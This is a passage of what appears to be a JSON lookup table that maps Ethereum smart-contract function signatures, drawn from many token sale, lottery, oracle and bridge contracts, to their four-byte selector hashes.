"tokensSoftCap()": "0xe6aaae81", "exotownToken()": "0x7978c7ed", "contact()": "0x33a8c45a", "totalCount()": "0x34eafb11", "tier()": "0x16f4d022", "TEAM_TOKENS_SUPPLY()": "0x31694d6f", "totalWeiSale()": "0xb83a4da9", "minSumICOStage2USD()": "0xe3c4b1ae", "tokenImporter()": "0x681d52de", "FINANCE_CAP()": "0xf22c8f63", "tournamentsAddr()": "0xe80b128f", "goldToken()": "0x94002b57", "requiredBlocksElapsedForVictory()": "0x24fa6f3b", "balance_out()": "0x6d773cd0", "getTotalBorrowingMonsters()": "0x17880b67", "claimPoints()": "0x04d092c7", "validationPrice()": "0xae7d00f3", "EthperPoe()": "0x434c4498", "minQuanValues()": "0xd6823455", "totalUserTransfered()": "0xea64ad37", "WAIT_BLOCKS()": "0x9874a3d0", "foundationlock()": "0xc9a365a7", "developersAllocation()": "0x6e8ac0c8", "MARKET_CAP_PER_ROUND()": "0x304de747", "getBoughtTokens()": "0xe5df7b10", "icoParametersSet()": "0x97b6cf42", "outputWalletAddress()": "0xe93239d3", "contractbacklist()": "0xaf53dc6e", "WEI_PER_FINNEY()": "0x8c3753d7", "bonusInPhase4()": "0x893ae703", "purchaseSeconds()": "0xe2954a14", "whitelistAdd()": "0x6ceec70d", "BONUS_TOKENS_RESERVED()": "0xf1f732cb", "hasFunded()": "0x1e171d7c", "addressDevelopers()": "0xb09db392", "endEthGet()": "0xf34186c8", "firstRefundRoundFinishTimestamp()": "0xcfcba2f8", "isInCrowdsale()": "0x48aa71f4", "bonusesPayed()": "0xe495faf4", "minBonus()": "0xd45c241c", "nCeilings()": "0x953440f9", "nonEthWeiRaised()": "0xb16d1538", "myCompany()": "0xf714a96e", "TOKEN_CLAIM_WAITING_PERIOD()": "0x45714c7b", "startTimeTLP2()": "0x5db5d1fb", "FUNDING_GOAL()": "0x42e49d5a", "financingPeriod()": "0xc518123a", "tokenTwitter()": "0xc1c379ac", "BONUS_ICO_STAGE1_PRE_SALE4()": "0x11e13c32", "for_longterm()": "0xd702b63d", "KIN_FOUNDATION_ADDRESS()": "0xff25f859", "acceptOwnershipOffer()": "0xf5385345", "stb()": "0xbd65fc4c", "minting()": "0x7dc2268c", "confirmedSaleEther()": "0x24e846c7", "techProvider()": "0x0a8d5fb8", "FundingEntity()": "0xb37edb66", "nokuMasterToken()": "0x8544023a", "TEAM_GROUP_WALLET()": "0xeca0be47", "kappa()": "0x6bba3f2f", "Nplay()": "0x520fd799", "currentRefundInvestorsBallot()": "0x0d11dd70", "amountReservedRefsTokens()": "0xefc8d3c6", "ActiveProposalNum()": "0x81a7a503", "minimumContributionPhase5()": "0x69d58d41", "_creator()": "0xbc8bde64", "hodlTillBlock()": "0x0c8b29ae", "setMaxPower(uint256)": "0x5c693657", "PowerEnabled(address,address,address,address)": "0xbdbcd192", "attend(address[])": "0x982495c7", "setLimitOfParticipants(uint256)": "0x9989a5ae", "payback()": "0x854bec87", "isPaid(address)": "0x6ded82f8", "isAttended(address)": "0xa07f3a56", "totalBalance()": "0xad7a672f", "registerInternal(string)": "0x49f2a049", "registerWithEncryption(string,string)": "0x5d27bff3", "Conference(string,uint256,uint256,uint256,string)": "0x4dcc889d", "oraclize_randomDS_proofVerify__main(bytes,bytes32,bytes,string)": "0x0aa6d45d", "matchBytes32Prefix(bytes32,bytes)": "0xe916d29e", "oraclize_randomDS_proofVerify__sessionKeyValidity(bytes,uint256)": "0xe3252a76", "verifySig(bytes32,bytes,bytes)": "0x616a3420", "oraclize_randomDS_setCommitment(bytes32,bytes32)": "0x31a83ca2", "oraclize_newRandomDSQuery(uint256,uint256,bytes,uint256)": "0x93d84bf0", "oraclize_getNetworkName()": "0xad09019d", "oraclize_setNetworkName(string)": "0x48e76563", "ba2cbor(bytes[])": "0x0d0bfb2f", "oraclize_randomDS_getSessionPubKeyHash()": "0x332b0b34", "oraclize_query(string,bytes[5],uint256)": "0x47bdc8b4", "oraclize_query(uint256,string,bytes[5],uint256)": "0x64561370", "oraclize_query(uint256,string,bytes[5])": "0x6fa07d0d", "oraclize_query(string,bytes[5])": "0xb598afcb", "oraclize_query(string,bytes[4],uint256)": "0x33fd40ec", "oraclize_query(uint256,string,bytes[4],uint256)": "0xd07ac4c4", "oraclize_query(uint256,string,bytes[4])": "0x008cbc8c", "oraclize_query(string,bytes[4])": "0x23040327", "oraclize_query(string,bytes[3],uint256)": "0x311385f4", "oraclize_query(uint256,string,bytes[3],uint256)": "0xe496f510", "oraclize_query(uint256,string,bytes[3])": "0xc4c4e438", "oraclize_query(string,bytes[3])": "0xb7eff231", "oraclize_query(string,bytes[2],uint256)": "0x00c822fb", "oraclize_query(uint256,string,bytes[2],uint256)": "0x3dc268a6", "oraclize_query(uint256,string,bytes[2])": "0xc8cada78", "oraclize_query(string,bytes[2])": "0xf384764c", "oraclize_query(string,bytes[1],uint256)": "0x1c57a386", "oraclize_query(uint256,string,bytes[1],uint256)": "0x9c31200b", "oraclize_query(uint256,string,bytes[1])": "0x4e9e456b", "oraclize_query(string,bytes[1])": "0xd7d7be34", "oraclize_query(string,bytes[],uint256)": "0xec8d82f8", "oraclize_query(uint256,string,bytes[],uint256)": "0xfdbd956d", "oraclize_query(uint256,string,bytes[])": "0x30a0b231", "oraclize_query(string,bytes[])": "0xd300a034", "oraclize_useCoupon(string)": "0xedf1eeb0", "randomDS_getSessionPubKeyHash()": "0xabaa5f3e", "releasePayment(bytes32,address,uint256,address,uint256,uint256,address)": "0xa18dda19", "lockPayment(bytes32,address,uint256,address)": "0x86bd4ef7", "disableServiceMode()": "0xe305044f", "enableServiceMode()": "0x61066dc3", "PaymentProcessor(address)": "0x6ede696b", "checkVeracity(string)": "0xcb7fd9db", "seedVerification(string)": "0xad5fb2b1", "addVerification(address,string,string)": "0x309d6669", "localsTruth(address,uint256)": "0x3b7f9649", "findIdByHostPort(string,uint256)": "0xca0941b4", "listByGroup(string)": "0x24b508a3", "listAll()": "0x78a9eeed", "isServerEnable(string)": "0xa0d578f4", "find(string)": "0x82b7b500", "enable(string,uint256)": "0xb2a840c0", "deleteById(string)": "0x276e6472", "insert(string)": "0xb1498e29", "FileServerManager()": "0xc74352af", "testCampaignGoalReached()": "0x4a635d05", "testFundACampaign()": "0x2288193b", "testStartNewCampaign()": "0x3af6486e", "getSlice(uint256,uint256)": "0x5d239d3e", "getItem(uint256)": "0x3129e773", "setData(uint256[])": "0xc87cfe63", "result()": "0x65372147", "TestContract(address)": "0x7ce901e7", "getFrequency(uint256)": "0xd3f8868b", "getReward(uint256)": "0x1c4b774b", "getEnd(uint256)": "0x7ee96f6d", "getStart(uint256)": "0x5bc22d1b", "getIpfs(uint256)": "0x6d7fd1bf", "checkFunding()": "0x0a7d29aa", "completeTask(uint256)": "0xe1e29558", "addTask(bytes,uint256,uint256,address,uint256,uint256,uint256)": "0x09a71a00", "Goal()": "0x94650fb8", "create(address,int256,address,address)": "0xea85b367", "finaliseFunding()": "0xe92254ba", "mintSendTokens(int256)": "0x739beded", "getPresaleAllocation(address,address)": "0x8bace717", "addPresaleAllocation(address,address,uint256)": "0x07b15667", "RocketPoolPresale(address)": "0x922da521", "FaucetToken(string,string,uint8)": "0x60737a7c", "getOffer(address,address)": "0xa4b48828", "getRecordOffers(address)": "0x7dfb0ba5", "transferRecord(address,address,uint256)": "0xb091a044", "deleteOffer(address,address)": "0x64d85348", "acceptOffer(address,address,uint256)": "0x1821e7c6", "cancelOffer(address)": "0x9b8a74f0", "newOffer(address,string)": "0x1ae7b8e1", "deleteRecord(address)": "0x0d1f3471", "reclaim(address)": "0xfc772c8b", "deList(address)": "0x4c70b6b2", "createRepository(bytes32,bytes)": "0x0bb9ee71", "stopIssuingIndividualTokens()": "0x31fa90d8", "changeUtilityAccount(address)": "0xd4112c56", "MultipleTokenVesting(uint256,uint256,uint256,address,uint256)": "0xe3e77055", "SocialMediaIncomeCrowdsale(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x16bf3537", "icoHasEnded()": "0x9fac9abf", "preIcoHasEnded()": "0x8b092580", "Crowdsale(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x056362e8", "UVDICO()": "0xe95bcfb1", "airdropIndividual(address[],uint256[],uint256,uint256)": "0x2b6b7c69", "getLast24hSendingValue(address)": "0x12504109", "getTransferInfoValue(address,uint256)": "0x31a642db", "getTransferInfoTime(address,uint256)": "0xe31f28ef", "getTransferInfo(address,uint256)": "0xce2fce38", "getTransferInfoCount(address)": "0xac9cd354", "getIsSendingLocked(address)": "0x5c622c09", "getIsAllTransfersLocked()": "0xcfea751f", "setIsSendingLocked(address,bool)": "0x65cd3686", "setIsAllTransfersLocked(bool)": "0x6172f071", "enableTokenSupport(bool)": "0xd02c438a", "super_transferFrom(address,address,uint256)": "0x030e30df", "super_transfer(address,uint256)": "0x0e0c3f58", "TCToken()": "0x2e1a37ee", "assembleUnicorn()": "0x50f3dd7a", "updatePriceFromRealUnicornPrice()": "0x7c842e5e", "withdrawForeignTokens(address,bool)": "0xb520b68c", "withdraw(bool)": "0xa810a54c", "changeRealUnicornAddress(address)": "0x38c5a3dc", "changeTokenOwner(address)": "0x0f809adb", "WhiteBitcoin()": "0x88eea4f3", "activateNextRound()": "0xe8bc0d40", "upgradeKingdomType(string,uint256)": "0x4dea208b", "setNbKingdomsType(uint256,address,bool)": "0xccee31e8", "Map(address,uint256)": "0xff8ed0f7", "BossCoin()": "0x90a744fe", "PreSale(address,address)": "0x4d358a00", "KyberNetworkCrystal(uint256,uint256,uint256,address)": "0x0b6386d4", "setSlackUsersCap(uint256)": "0xb7465a19", "KyberContributorWhitelist()": "0xd108b7d4", "proxyBuy(bytes32,address)": "0xadfceb9a", "ETHCONEarlyBirdToken()": "0x762ede1e", "backGamePlayerCoinOwner()": "0xfb293a34", "FRP()": "0xa349d683", "ZazToken()": "0x4cef2221", "CGCoinsToken()": "0xaf60b50f", "C3_TokenCreate(uint256,string,string)": "0xfec8db83", "Nordic()": "0xb208a600", "hasEndedIco()": "0x7ebedc34", "validPurchaseIco(uint256)": "0xfa671f6b", "buyTokensIco(address)": "0xf1dd6147", "getRateIco()": "0x2ab26831", "reclaimToken()": "0xfff28137", "setBaseRate(uint256)": "0x1d08837b", "setICOParams(uint256,uint256,uint256)": "0x4de0cdf2", "ICO(address,address)": "0xbe8a550d", "withdraw_token(address)": "0x9cd3cb5d", "GVFX()": "0xc39ffc65", "oraclize_setGasPrice(uint256)": "0xb0859b6f", "CavsvsPacers425()": "0x3683ec67", "setData(address,string)": "0x0b51989a", "GUOcoin()": "0x6fba4aa9", "withdrawExtraToken(address)": "0xe7d29d8b", "AutomobileCyberchainToken()": "0x6982f45a", "HedgeCoinCapitalToken()": "0x7c812015", "WISDOMCOIN()": "0x4a4b4eb0", "JincorTokenPreSale(uint256,uint256,address,address,uint256,uint256,uint256,uint256,uint256)": "0x90e8edd8", "PEPEso()": "0x287fcbfc", "ownerTransferJackpotToken(address,uint256)": "0x64d98bd3", "ownerSetJackpotToken(address,uint256,uint256,uint256)": "0xfa57ff82", "ownerSetRandomGenerateMethod(uint256)": "0xf4f94a40", "ownerSetRandomApiKey(string)": "0x8681a07f", "ownerModOperator(address,bool,uint256)": "0x517186f3", "Etherwow()": "0xa927f46b", "FlexiERC20Token()": "0x2f4e32f5", "startSale(uint256,uint256,uint256,address)": "0x549cbc7a", "setHardCapValue(uint256)": "0x0367f96d", "HashRushICO()": "0x0ff4d239", "HashRush(string,string,uint8,uint256)": "0xbd1607ed", "MIOTToken(uint256,string,string)": "0x35b94b5d", "releaseReserve(uint256)": "0x101005bd", "prepopulate(address)": "0xbeb9d27e", "GMRTokenManager(address)": "0xb2ac5407", "userWeiSpent(address)": "0xd4fc5822", "userHasKYC(address)": "0x4438d222", "hasPreSaleEnded()": "0x7878903c", "isCrowdSaleRunning()": "0x37ee1837", "isPreSaleRunning()": "0xd5e4a36e", "isTokenSaleRunning()": "0xe582645e", "setKYCManager(address)": "0x37e05590", "disapproveUserKYC(address)": "0x98d48567", "approveUserKYC(address)": "0xa3a6a43e", "updateMaxTxGas(uint256)": "0xd51abbd9", "setSaleWeiLimitWithoutKYC(uint256)": "0xb1194648", "finishContract()": "0x8a5d815e", "GimmerTokenSale(address,address,uint256,uint256)": "0x4e9f0f06", "GimmerToken()": "0x99379718", "GMRToken()": "0x5f2ebcf2", "editPayoutSetting(uint8,uint16)": "0x249586f2", "editMaxItems(uint8)": "0xc59f6983", "editBasePrice(uint256)": "0x75b5243d", "editTimer(uint8,uint256)": "0xe84b69e4", "getSanPrevOwner(uint256)": "0x3289fba6", "getSanTimeLastMove(uint256)": "0xbe9ddfed", "getSanTimeAlive(uint256)": "0x19236b4e", "getSanageLink(uint256)": "0x975c5cab", "getSanName(uint256)": "0xd812d961", "getSanIdFromName(string)": "0x47f5666f", "getSANOwner(uint256)": "0xc294c93b", "sanMint(string,string)": "0xd88905fa", "XJJ()": "0x55947d16", "TokenGAC(uint256,string,string)": "0xf2bf7e7a", "withdraw_eth()": "0xd6f8560d", "sams(uint256,string,string)": "0x7feec9be", "ICONClassicToken()": "0xf9b5c633", "Thrill()": "0xb2da302b", "BKCToken()": "0x0eacf634", "withdrawBonds(uint256)": "0xf6806074", "getRealRndMaxTime(uint256)": "0x67b16cd6", "updateLastBuyKeysPIDs(uint256,uint256)": "0xa8077951", "getCurrentRoundInfo2()": "0x8fb0de08", "VzanToken(uint256,string,string)": "0x983c8449", "HC8ICO()": "0xfedda73b", "LYNIA()": "0xd4686534", "AcceptsLYNIA(address)": "0x6a6c526e", "LILITHCOIN()": "0x1dbdd617", "MDA()": "0xe091de56", "TrexToken()": "0x099224e9", "transferERC20(address,uint256,address)": "0x97e10a79", "SCH()": "0xc5494b82", "hasExtension(address)": "0xc604bec9", "AntiFakeLabelToken(address,uint256)": "0xf3a87492", "unpauseSALE()": "0xb30cf414", "pauseSALE()": "0x0229b23e", "incSALESTATE()": "0x25b6ae80", "startPRESALE()": "0x42a5000d", "CloseSaleFund()": "0x5e5d73b5", "SetupCrowdSale()": "0xfca346af", "SetupReserve(address)": "0x0396ece5", "BlockRefunded(address)": "0xcb9d86e2", "Revoke(address)": "0x9f77920c", "Unlock_Tokens(address)": "0xacbfbd9e", "Purchase(address,uint256,uint256,uint256)": "0x5bc97d73", "SetAuxOwner(address)": "0xc6240303", "allocateVestable(address,uint256,uint256,uint256)": "0x86005b14", "simpletransfer(address,uint256,uint256)": "0x89b1714b", "canTake(address)": "0x0814931a", "ComputeVestSpend(address)": "0xa1f902a7", "CheckRevoke(address)": "0xa964bea7", "LockedCrowdSale(address)": "0x5cac79b2", "RevokeTokens(address)": "0xa8e1903c", "GetEtherSpent(address)": "0xefa8d998", "KYRIOSToken()": "0xbd897671", "AntriexToken(uint256,string,string)": "0x57dd2f26", "whitelistToken(address)": "0x6247f6f2", "setTokenBankrollAddress(uint8,address)": "0xbe165566", "gameGetTokenBankrollList()": "0xb1db1cac", "_tokenAllocate(uint8)": "0x52dd336a", "tokenAllocate()": "0x607db616", "_tokenBankrollBuyIn(uint8)": "0x248c6380", "tokenBankrollBuyIn()": "0x39333bbe", "collectStakingBonusTokens()": "0xbf14dcbf", "setStakeAddress(address)": "0x23471d18", "_allocateETH(uint8,bool)": "0xf814530b", "allocateETH(bool)": "0xa22ba787", "buyInSaturday()": "0x225f406a", "buyInWithAllBalance()": "0x7fa7a7c8", "createToken(string,string,uint8)": "0xe8a0aed3", "MyToken(string,string,uint8,address)": "0x4a12389a", "setLockup_dakehus(address,uint256,uint256)": "0x0eb4d170", "setLockup_jiedians(address,uint256,uint256)": "0xfa48dfcd", "setLockup_simus(address,uint256,uint256)": "0x9eeb4920", "setLockup_jishis(address,uint256,uint256)": "0x1adb4842", "getLockedAmount_dakehus(address)": "0x59e09fec", "getLockedAmount_jiedians(address)": "0xa913c43f", "getLockedAmount_simus(address)": "0x27cd0d96", "getLockedAmount_jishis(address)": "0x462c6070", "EIForceCoin()": "0xab1b3830", "oxleytoken()": "0xb3df5b45", "getWorkTime(uint256,uint256)": "0x7198801d", "setTimeStamp(string,uint256)": "0xc68e52d9", "setOldContractData(address)": "0xd3cce1d2", "calcTotalWinnerKeys(uint256)": "0x17671962", "hasPlayersInRound(uint256)": "0x8b66e3b4", "isWinner(uint256,uint256)": "0xc98bd7da", "registerNameXnameFromDapp(address,bytes32,bytes32)": "0xd165d7cd", "registerNameXaddrFromDapp(address,bytes32,address)": "0xc7d77970", "registerName(address,bytes32,uint256)": "0xa70f84c3", "gameSettings(uint256,uint256)": "0x7367f156", "TD(uint256,string,string,uint8)": "0x8d792964", "NOBSToken()": "0x6a95dff4", "getStateHash(uint256)": "0x54823e66", "transferAsChild(address,uint256,address,uint256,uint256,bytes)": "0xc0a899f2", "transferFromParent(address,uint256,address,uint256,bytes)": "0x5e3e2687", "removeBottomUpChild(address,uint256,uint256)": "0xb4a97fc1", "erc20Received(address,uint256,address,uint256)": "0x9e95670d", "removeERC20(uint256,address,uint256)": "0x9771ccc8", "transferChildToParent(uint256,address,uint256,address,uint256,bytes)": "0x08937f62", "transferChild(uint256,address,address,uint256)": "0xbef44f18", "safeTransferChild(uint256,address,address,uint256,bytes)": "0x8d81f51e", "safeTransferChild(uint256,address,address,uint256)": "0x1d98f3c5", "removeChild(uint256,address,uint256)": "0x0f0ba766", "setRequestBurnerContract(address)": "0x524eb29c", "setMaxCollectable(uint256)": "0xd7b8de00", "setRateFees(uint256,uint256)": "0xc6011633", "collectEstimation(int256)": "0x18954b3e", "collectForREQBurning(uint256)": "0x13b3cd91", "RequestCollectInterface(address)": "0xd5518feb", "extractBytes32(bytes,uint256)": "0xb1e05e8a", "extractAddress(bytes,uint256)": "0x5855da3d", "generateRequestId()": "0x6b0c537b", "extractString(bytes,uint8,uint256)": "0x215d902c", "getPayeeIndex(bytes32,address,address)": "0x41f1f3e5", "getExpectedAmount(bytes32)": "0xfcc01cce", "areAllBalanceNull(bytes32)": "0x07550f0a", "getPayeeBalance(bytes32,uint8)": "0x7d1842ec", "getCurrencyContract(bytes32)": "0x9e3572b5", "getSubPayeesCount(bytes32)": "0xcaef5dec", "getPayeeExpectedAmount(bytes32,uint8)": "0x2ad8d875", "getPayer(bytes32)": "0xa12cad70", "getPayeeAddress(bytes32,uint8)": "0x92fd1f01", "initSubPayees(bytes32,address[],int256[])": "0xdd6ed59a", "updateExpectedAmount(bytes32,uint8,int256)": "0xce165894", "updateBalance(bytes32,uint8,int256)": "0xb073f52b", "createRequestFromBytes(bytes)": "0xe1cda468", "createRequest(address,address[],int256[],address,string)": "0x43107290", "isTrustedContract(address)": "0x5bf3a315", "getStatusContract(address)": "0xf8db71b5", "adminRemoveTrustedCurrencyContract(address)": "0x0410fac7", "adminAddTrustedCurrencyContract(address)": "0x857bcb2c", "add(uint96,uint96)": "0x274acb35", "sub(uint96,uint96)": "0xc79eaa22", "div(uint96,uint96)": "0xe5e7fa53", "mul(uint96,uint96)": "0x70fde32c", "add(uint8,uint8)": "0xbb4e3f4d", "sub(uint8,uint8)": "0x1e5f34af", "div(uint8,uint8)": "0x21c60ac6", "mul(uint8,uint8)": "0xe51a3b40", "toUint256Safe(int256)": "0x744f7c7d", "toInt256Safe(uint256)": "0xe823b9bf", "ESCCrowdsale()": "0xc66e9260", "setPayoutWallet(address)": "0x6b8f9c43", "onDelivery()": "0x1e9a6272", "deliverTokens(uint256)": "0x868467e6", "addInvestor(address)": "0xe641bde1", "updateTokenAmount(address,uint256,uint256)": "0xa40c5221", "postExternalPayment(address,uint256,uint256,uint8,uint256)": "0x4b8b4cee", "postWalletPayment(uint256)": "0x3a30cdec", "setFinishTime(uint256)": "0x4947c8d0", "investorPayment(address,uint256)": "0x6f096f75", "investorInfo(address)": "0xdbcbaca4", "MINERTA()": "0x1cac7b7f", "getTransactionIds(bool)": "0x940beaf5", "getTransactionCount(bool)": "0x30dfe1da", "addTransaction(address,uint256,string,bytes)": "0x7a4822d7", "submitTransaction(address,uint256,string,bytes)": "0xe6a9026b", "getFreezeInfo(address)": "0xfb13bfae", "issueAndFreeze(address,uint256,uint256)": "0x007d8051", "ixix()": "0x88aed238", "getSignatures(string)": "0x2404608f", "getSignatureAtIndex(string,uint256)": "0x48e9657d", "sign(string)": "0x79d6348d", "dropNectar(address[])": "0x065de950", "CryptoRideCoin(uint256,string,uint8,string)": "0xb7028b1c", "EligmaTokenContract()": "0x4465e38c", "setCrowdsaleContractAddress(address)": "0x14163a83", "setTokenContractAddress(address)": "0xb23d4854", "doTeamMinting(address)": "0xca1d6f73", "doCrowdsaleMinting(address,uint256,uint256)": "0x0472a3bf", "doPresaleMinting(address,uint256,uint256)": "0xdb06f0c2", "bitvimToken()": "0x9fcbc6f1", "CBCT()": "0xe8a12479", "IJC()": "0xb0ce8668", "POPToken()": "0xdba232e3", "setCrowdsale(address)": "0x483a20b2", "decreaseFrozen(address,uint256)": "0x4185fdc5", "increaseFrozen(address,uint256)": "0xbfabd754", "setUnfreezeTimestamp(uint256)": "0xb65c2611", "setInitialize(bool)": "0x6a3c167b", "setErc677token(address)": "0x6f64824b", "setTotalSpentPerDay(uint256,uint256)": "0x5ba6c017", "setNumDepositsSigned(bytes32,uint256)": "0x53b64b0b", "setNumMessagesSigned(bytes32,uint256)": "0x4db52924", "setDepositsSigned(bytes32,bool)": "0x982bb5d8", "setMessagesSigned(bytes32,bool)": "0xb38bf811", "numDepositsSigned(bytes32)": "0xaa81f862", "numMessagesSigned(bytes32)": "0x0cbf0601", "markAsProcessed(uint256)": "0x247ab51f", "depositsSigned(bytes32)": "0x79304063", "messagesSigned(bytes32)": "0x8f4b4b98", "setSignatures(bytes32,bytes)": "0x70260363", "signatures(bytes32)": "0x2422224e", "setMessages(bytes32,bytes)": "0x4b563657", "messages(bytes32)": "0x2bbd59ca", "withinLimit(uint256)": "0xea9f4968", "setForeignDailyLimit(uint256)": "0xcbbc8a51", "getCurrentDay()": "0x3e6968b6", "message(bytes32)": "0x490a32c6", "signature(bytes32,uint256)": "0x1812d996", "isAlreadyProcessed(uint256)": "0xffd19e8c", "gasPriceForCompensationAtHomeSide()": "0xbea7c13a", "submitSignature(bytes,bytes)": "0x630cea8e", "Gambit()": "0xc3ef586a", "BlueDiamond()": "0x94b9bdc4", "takeFee(uint256,address)": "0xbf6ec777", "rateOf(address)": "0xcbf09802", "setFee(address,uint256)": "0xe55156b5", "setDefaultFee(uint256)": "0xc93a6c84", "XCareToken(uint256,string,string)": "0x3982b55d", "calculateExchangeFee(uint256)": "0x9aa03cc6", "setTransferFees(uint256,uint256,uint256)": "0xbfd201f5", "calculateTransferFee(address,address,uint256)": "0x4d3d14f2", "_transfer(address,address,uint256,string,uint256)": "0xfa8ec0b2", "_transfer(address,address,uint256,string)": "0x62f2296e", "_transferFrom(address,address,uint256,string)": "0x48b52c7d", "_increaseApproval(address,address,uint256)": "0x8a6e0a8e", "_checkHashAndTransferExecutorFee(bytes32,bytes,address,uint256,uint256)": "0x371fe247", "transferFromWithNarrative(address,address,uint256,string)": "0x76587921", "transferWithNarrative(address,uint256,string)": "0xffdcf095", "transferNotification(address,uint256,uint256)": "0x64e7e4a4", "toEthSignedMessageHash(bytes32)": "0x918a15cf", "REKTTokenSale(address,address,uint256)": "0xabfccf3c", "GcoinProto()": "0xfe75dff6", "bid(uint16,uint256)": "0x3623c225", "isEnded(uint16)": "0x1749c16f", "addAuction(uint40,uint256)": "0xa7cfe365", "finish(uint16)": "0xefa227ca", "getAuctions(address)": "0xfb0f9363", "getBiddingInfo(uint16,address)": "0x7fddc0de", "Google()": "0xbf0f88ae", "ProofOfIdiot()": "0x80f393c8", "YCCToken(uint256,string,uint8,string)": "0x1abb7192", "unhaltICO()": "0x06eca511", "haltICO()": "0x129caa18", "claimEDEX(address)": "0x81813963", "changeSecondaryWallet(address)": "0xcbcf98e6", "changeMainWallet(address)": "0x3e97db0d", "removeLiquidity(uint256)": "0x9c8f9f23", "addLiquidity()": "0xe8078d94", "checkLiquidationValue(uint256)": "0xa1741d0f", "enact_liquidation_less(address,uint256,uint256)": "0xbabb019d", "enact_liquidation_greater_equal(address,uint256,uint256)": "0x1321d291", "liquidate()": "0x28a07025", "requestLiquidation(uint256)": "0x95069136", "changePriceUpdateWaitingTime(uint256)": "0xabbc54b0", "changeIcoEndBlock(uint256)": "0x750ee24a", "changeIcoStartBlock(uint256)": "0x87d67208", "icoBottomIntegerPrice()": "0xccb6cbe8", "removeVerifiedInvestor(address)": "0x133f44dc", "verifyInvestor(address)": "0xd84dbdc3", "privateSaleTokens(address,uint256)": "0x4f495513", "tokenAllocation(address,uint256)": "0x210b7e0b", "updatePriceBottomInteger(uint256)": "0x1998524c", "require_limited_change(uint256)": "0x66ecc9e2", "updatePriceEDEX(uint256)": "0xc33a66e0", "setGrantVestedEDEXContract(address)": "0xf3647597", "EDEX(address,uint256,uint256,uint256)": "0x2bb51a05", "dispatchTo(address,uint256)": "0x02e9ad65", "AlphaToken(string,string)": "0x63aba603", "mintExtraTokens()": "0x9095269d", "setDevelopersTokensWallet(address)": "0x940f02e0", "setDevelopersTokens(uint256)": "0x01044632", "setAdvisorsTokens(uint256)": "0x90ca38d9", "setBountyTokens(uint256)": "0x6412aeb1", "buyTokens(address,uint256,bytes4,bytes32)": "0x990e713b", "assignReserveSupply(address)": "0x8d5a225e", "assignFoundationSupply(address)": "0x2ec47069", "allocateLoyaltySpend(uint256)": "0x358564ee", "setLoyaltyWallet(address)": "0xd923a0be", "initiateTeamVesting(address)": "0xf9249fbf", "XcelToken(address)": "0x39b25ad1", "CalorieCoin(address,address,uint256)": "0xb799ba7e", "revoke(bytes32,address,bool)": "0xebf056e3", "certify(bytes32)": "0x24c74c78", "computeCertHash(address,bytes32)": "0x7b1760da", "setCertifierInfo(address,bool,string)": "0x233023de", "TVToken()": "0x191d7a7a", "buyTokens(address,uint128,uint256)": "0xc5444ff9", "generateKey()": "0x922dd7d9", "enter(bytes32)": "0x568ab21e", "setGatekeeperAddress(address)": "0x76d92428", "RewardPoint()": "0x9d735fc5", "BoomstarterPreICO(address[],address,address,uint256,bool)": "0xca30597d", "SCPSToken(uint256,string,string)": "0x3ed70628", "LibraCreditNetwork(uint256,string,uint8,string)": "0x7ca63061", "BlueTitaniumClassic()": "0xcc0d0c90", "GATcoin(uint256,string,string)": "0x4920781b", "multiplyTokensSend(address[],uint256[])": "0xa7721e0f", "BidiumToken(address,address,address,address)": "0x0c319d80", "WeatherToken()": "0x33751fec", "WithdrawForeign(address)": "0x950108d7", "EliteToken()": "0x02ee50e0", "unlockVoterMusic(uint256)": "0xee89bb87", "VoteMusic(uint256,address)": "0x87e70933", "SponsorMusic(uint256,uint256,address)": "0xa7a3ba54", "DoMusicPayout(uint256)": "0x789fdcb6", "DownloadMusic(uint256,address,uint256)": "0x417b3409", "UploadMusic(uint256,string,address,bool,uint256,uint256)": "0x08caaa46", "TrendNetworkToken()": "0x7411b2b2", "MIST()": "0xc81cbc5c", "withdrawalToken(address)": "0x062e43a1", "batchTransfer(address[],uint256[],address)": "0xbb0a64b6", "getLastTimeUpdated()": "0xd390021d", "transferStampsToOwner(uint256)": "0x501bfb60", "buyStamps()": "0x1fa0914e", "CodeMailStampSale()": "0x397efdbc", "CodeMailStamp()": "0x0249e64a", "checkLottery(uint256)": "0xf43acb52", "getLotteryClass(uint8[7],uint256)": "0x7445690b", "_pushLuckyInfo(uint256,uint8,address,uint256)": "0xd1c7be4d", "_getLuckyList(uint256,uint8)": "0xd0044f9a", "_getGen0Address(uint256)": "0xf2f3384e", "distributeLottery()": "0x98edc9ce", "registerLottery(uint256)": "0x6bee2cc3", "setLotteryDuration(uint256)": "0x2b58150b", "FinalLottery(address)": "0x6a9e8480", "toSPool(uint256)": "0x0c1a8b05", "rewardLottery(bool)": "0xe5d71cfe", "setFinalLotteryAddress(address)": "0x8c4430b4", "LotteryCore(address)": "0x981566ce", "_validGenes(uint256)": "0xfcb0e55c", "_getValidRandomGenes()": "0x71da0e63", "openCarousel()": "0x24a434eb", "random2()": "0xc5337ed4", "openLottery(uint8)": "0x27729e93", "random(uint8)": "0xe0e0e2d3", "convertGene(uint8[7])": "0x09d7ab7a", "convertGeneArray(uint256)": "0x8a24fd78", "getCurrentTerm()": "0x92ecf577", "_isCarousal(uint256)": "0x760df4fe", "toLotteryPool(uint256)": "0xb76b37dd", "BeatOrgTokenPostSale(address)": "0x77870bce", "getSnakemasterReq()": "0xd9e5a50b", "getMySnake()": "0x3511c1af", "getFreeSnake()": "0x0fc8afbd", "becomeSnakemaster()": "0xb6975ddb", "SnakeFarmer()": "0x1a65d3c2", "isChipPassword(uint256,string)": "0x640c3dbd", "getChipValue()": "0x9c8e1d50", "getChipIds(bool)": "0x290c398f", "getNumChips()": "0x30a3ce81", "isClaimed(uint256)": "0x9e34070f", "mintChip(bytes32)": "0x5a70686a", "claimChip(uint256,string)": "0x2bdcd90d", "ChipTreasury()": "0x5a2de12f", "Flye()": "0xfba17fc9", "vest(address,uint256,uint256)": "0x2546de10", "claim(address,bytes)": "0xbb1757cf", "getADR()": "0x2422d991", "getMIRABALANCE()": "0x5f3040bf", "Prakashcoin()": "0x5eff8b48", "birthKitty()": "0x03bf8e70", "getKittyCount(address)": "0x3dc60e52", "getKittyGetOrNot(address)": "0x02fbe0d5", "getKitties()": "0xfb2dfa45", "createKitties()": "0x7ef3bb63", "setKittyTokenAddress(address,address)": "0x841a12bd", "CaptainKitty()": "0xbfff23f2", "CreateKittyToken(address,uint256,uint32)": "0xae5c1816", "EpicExchange()": "0x269de5a0", "getTeamTokens(uint256)": "0xefdcc0f8", "viewTeamTokens()": "0xd45036c7", "BittechToken()": "0x7bef29f7", 